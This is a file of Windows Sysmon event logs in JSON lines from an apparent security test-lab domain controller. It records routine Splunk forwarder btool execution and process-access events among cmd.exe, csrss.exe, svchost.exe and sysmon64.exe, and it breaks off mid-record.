{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2067,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.309\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-00106CF10300}\r\nProcessId: 4084\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-106F-5F25-0000-0010B0F00300}\r\nParentProcessId: 4080\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.309","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-00106CF10300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-106F-5F25-0000-0010B0F00300}","ParentProcessId":"4080","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2068,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-106F-5F25-0000-0010B0F00300}\r\nSourceProcessId: 4080\r\nSourceThreadId: 3792\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00106CF10300}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010B0F00300}","SourceProcessId":"4080","SourceThreadId":"3792","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00106CF10300}","TargetProcessId":"4084","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2069,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00106CF10300}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00106CF10300}","TargetProcessId":"4084","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2070,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2071,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2072,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2073,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2074,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2075,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\